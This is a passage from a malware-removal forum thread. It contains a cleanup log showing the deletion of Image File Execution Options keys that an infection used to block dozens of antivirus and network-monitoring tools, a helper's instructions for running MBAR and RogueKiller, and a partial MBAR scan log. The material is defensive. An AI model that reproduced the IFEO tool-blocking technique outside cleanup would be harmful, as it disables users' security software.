AlternateDataStreams: C:\ProgramData\TEMP:33384BC0 [99]
AlternateDataStreams: C:\ProgramData\TEMP:3A6BC948 [115]
AlternateDataStreams: C:\ProgramData\TEMP:89C2A42C [116]
AlternateDataStreams: C:\ProgramData\TEMP:91486201 [185]
AlternateDataStreams: C:\ProgramData\TEMP:D2A5A561 [112]
AlternateDataStreams: C:\ProgramData\TEMP:DED17083 [250]

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION

Zip: C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4;C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m;C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt;C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt

EmptyTemp:
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\\Debugger => value removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Netmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nfservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\njeeves2.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nnf.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nod32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nod32krn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nprosec.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\NS.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nseupdatesvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nstzerospywarelite.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nvcod.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nvcsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nvoy.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nwscmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\oasclnt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\omnitray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\OnAccessInstaller.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ONLINENT.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\opf.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\opfsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\OPSSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\op_mon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\outpost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Packetizer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Packetyzer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pcipprev.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pctav.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pctavsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pcviper.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\persfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pfft.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pgaccount.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\prevxcsi.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\prifw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\privatefirewall" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\privatefirewall3.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ProcessHacker.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\procexp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\procguard.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\procmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\protect.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PSANHost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PSUAMain.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PSUAService.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PtSessionAgent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PtSvcHost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PtWatchDog.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pxagent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\QUHLPSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\rawshark.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\RDTask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\regedit.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\rtt_crc_service.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sab_wab.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sagui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SAPISSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SASCore64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SASTask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savadminservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savcleanup.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savcli.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savmain.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savprogress.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SBAMSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SBAMTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SBPIMSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SCANNER.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SCANWSCS.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\scfmanager.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\scfservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\schedulerdaemon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\scproxysrv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ScSecSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcdevcon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcdevconIA.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcdevconx.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDFSSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDScan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdtrayapp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDWelcome.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\siteadv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sndsrvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Sniffer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\snsmcon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\snsupd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SoftAct.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spfirewallsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sppfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spybotsd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SpyHunter3.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spywareterminatorshield.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spywat~1.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sp_rsser.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ssupdate.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SSUpdate64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SUPERAntiSpyware.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SUPERDelete.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Taskmgr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Tcpdump.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\terminet.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Tethereal.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\text2pcap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\THGuard.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tppfdmn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\TRAYICOS.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\TRAYSSER.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\trigger.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tscutynt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tshark.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tzpfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiSeAgnt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiUpdateTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiWatchDog.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiWinMgr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\umxagent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\umxtray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\UnThreat.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\updclient.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\UserAccountControlSettings.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\utsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\UUpd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uwcdsvr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Main.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Medic.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Proxy.ahn" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3SP.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Svc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Up.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VCATCH.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\vdtask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VIEWTCP.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VIPREUI.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\virusutilities.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VSDesktop.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\WebCompanion.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\webwall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Windump.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\winroute.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wireshark.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wwasher.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\xauth_service.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\xfilter.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Zanda.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zerospywarele.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zerospywarelite_installer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Zlh.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zlhh.exe" => key removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
Winsock: Catalog5 000000000003\\LibraryPath => restored successfully (%SystemRoot%\system32\NLAapi.dll)
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000004" => key removed successfully
Winsock: Catalog5-x64 000000000001\\LibraryPath => restored successfully (%SystemRoot%\system32\NLAapi.dll)

========= netsh winsock reset =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========

"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => key removed successfully
HKCR\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => key removed successfully
HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => key not found.
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value removed successfully
HKCR\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => key not found.
C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js => moved successfully
C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js => not found.
C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp => moved successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
alz4j5u7 => service removed successfully
catchme => service removed successfully
cpuz130 => service removed successfully
NVIDIAHWAccess => service removed successfully
nvlddmkm => service removed successfully
Synth3dVsc => service removed successfully
tsusbhub => service removed successfully
usbbus => service removed successfully
UsbDiag => service removed successfully
USBModem => service removed successfully
VGPU => service removed successfully
C:\ProgramData\tP5544K4.dat => moved successfully
C:\Users\Kevin\AppData\Local\Temp\svchost.exe => moved successfully
"C:\Windows\system64" => Deleting reparse point and unlocking started:
"C:\Windows\system64" =>Deleting reparse point and unlocking completed.
"C:\Windows\system64" =>Deleting reparse point and unlocking completed.
C:\Program Files\Common Files\Microsoft Shared => ":9JWpxEmW4v11qmJOqJ7pjYs" ADS removed successfully.
C:\ProgramData\Microsoft => ":cyqnzX4eKYNTzpFQUfDk" ADS removed successfully.
C:\ProgramData\Microsoft => ":okPhkWKR99NHqk9eugRi0qqcLPl" ADS removed successfully.
C:\ProgramData\TEMP => ":33384BC0" ADS removed successfully.
C:\ProgramData\TEMP => ":3A6BC948" ADS removed successfully.
C:\ProgramData\TEMP => ":89C2A42C" ADS removed successfully.
C:\ProgramData\TEMP => ":91486201" ADS removed successfully.
C:\ProgramData\TEMP => ":D2A5A561" ADS removed successfully.
C:\ProgramData\TEMP => ":DED17083" ADS removed successfully.
"HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile" => key removed successfully
================== Zip: ===================
C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4 -> copied successfully to C:\Users\Kevin\Desktop\Upload.zip
C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m -> copied successfully to C:\Users\Kevin\Desktop\Upload.zip
"C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt" -> not found
"C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt" -> not found
=========== Zip: End ===========

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 24360266 B
Java, Flash, Steam htmlcache => 392983088 B
Windows/system/drivers => 52994174 B
Edge => 0 B
Chrome => 114688 B
Firefox => 151663617 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 17898255 B
systemprofile32 => 3235585 B
LocalService => 132244 B
NetworkService => 66228 B
Kevin => 18155296 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 639 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 07:44:37 ====


Edited by jumpman17, 21 October 2016 - 07:11 AM.


#6 TsVk!


Posted 23 October 2016 - 12:55 AM

Hi Jumpman17

 

It's good that you've changed your banking password. I also highly recommend you change your primary email password and your PayPal password, particularly if they are saved within your browser.  A lot of financial damage can be done with these.

 

Download Malwarebytes Anti-Rootkit (MBAR) to your desktop.

  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click "Next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder located on your Desktop and paste the content of the following files in your next reply:
  • "mbar-log-{date} (xx-xx-xx).txt"
  • "system-log.txt"

RogueKiller Scan

  • Please download and install RogueKiller (x64).
  • Close any running programmes.
  • Double-click RogueKillerx64.exe to run the programme.
  • Follow the prompts. If a browser window opens, close the window.
  • In the HOME tab, click Start Scan.
  • Upon completion, a browser window may open. Close this window. 
  • Do not have RogueKiller remove any detected items.
  • Click the HISTORY tab, followed by Scan Reports.
  • Double-click the scan log. Click Open TXT.
  • A Notepad file will open. Please copy the contents of the log and paste in your next reply.

Please include in your reply.

  • MBAR logs
  • RogueKiller log

TsVk!



#7 jumpman17


Posted 23 October 2016 - 06:03 AM

Thanks, I'll make sure to change my email passwords as well. I don't have a PayPal though, so no worries there. Here are the requested logs.

 

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.23.01
  rootkit: v2016.09.26.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18349
Kevin :: KEVIN-PC [administrator]

10/23/2016 2:00:22 AM
mbar-log-2016-10-23 (02-00-22).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Kernel memory modifications detected. Deep Anti-Rootkit Scan engaged.
Objects scanned: 365742
Time elapsed: 16 minute(s), 46 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Malwarebytes Anti-Rootkit BETA 1.09.3.1001

© Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x64

Account is Administrative

Internet Explorer version: 11.0.9600.18349

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, E:\ DRIVE_FIXED, Z:\ DRIVE_FIXED
CPU speed: 3.392000 GHz
Memory total: 4194402304, free: 1792401408

Downloaded database version: v2016.10.23.01
Downloaded database version: v2016.09.26.02
Downloaded database version: v2016.09.21.01
=======================================
Initializing...
------------ Kernel report ------------
     10/23/2016 02:00:14
------------ Loaded modules -----------
\SystemRoot\system32\drivers\swenum.sys
\SystemRoot\system32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\HdAudio.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\system32\DRIVERS\iusb3hub.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\drivers\usbscan.sys
\SystemRoot\system32\DRIVERS\usbprint.sys
\SystemRoot\system32\DRIVERS\dot4usb.sys
\SystemRoot\system32\DRIVERS\Dot4.sys
\SystemRoot\system32\drivers\USBSTOR.SYS
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\Dot4Prt.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\Drivers\dump_dumpata.sys
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\system32\DRIVERS\LEqdUsb.Sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\LHidEqd.Sys
\SystemRoot\system32\DRIVERS\LHidFilt.Sys
\SystemRoot\system32\DRIVERS\LMouFilt.Sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\drivers\luafv.sys
\??\C:\Windows\system32\drivers\mbam.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\System32\Drivers\adfs.SYS
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\system32\DRIVERS\asyncmac.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\system32\DRIVERS\WUDFRd.sys
\SystemRoot\System32\Drivers\fastfat.SYS
\??\C:\Windows\system32\drivers\MBAMSwissArmy.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
----------- End -----------
Done!
IRP handler 0 of \Driver\USBSTOR points to an unknown module
Unhooking enabled.

Scan started
Database versions:
  main:    v2016.10.23.01
  rootkit: v2016.09.26.02

<<<1>>>
Upper Device Name: \Device\Harddisk3\DR3
Upper Device Object: 0xfffffa800638b060
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\000000aa\
Lower Device Object: 0xfffffa80063801f0
Lower Device Driver Name: \Driver\USBSTOR\
Device already Exists: 0xfffffa8006aa3360
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR2
Upper Device Object: 0xfffffa8006248790
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\0000008a\
Lower Device Object: 0xfffffa8004e876f0
Lower Device Driver Name: \Driver\USBSTOR\
Device already Exists: 0xfffffa8003d306c0
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR1
Upper Device Object: 0xfffffa80048ce620
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP1T0L0-1\
Lower Device Object: 0xfffffa80046a7060
Lower Device Driver Name: \Driver\atapi\
Device already Exists: 0xfffffa8006e63a50
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xfffffa800487e410
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP0T0L0-0\
Lower Device Object: 0xfffffa80046a0480
Lower Device Driver Name: \Driver\atapi\
Device already Exists: 0xfffffa80065b7240
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa800487e410, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa80048ce040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa800487e410, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80046a0260, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80046a0480, DeviceName: \Device\Ide\IdeDeviceP0T0L0-0\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0xfffff8a003691790, 0xfffffa800487e410, 0xfffffa80049b1390
Lower DeviceData: 0xfffff8a0059a1470, 0xfffffa80046a0480, 0xfffffa80065b7240
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
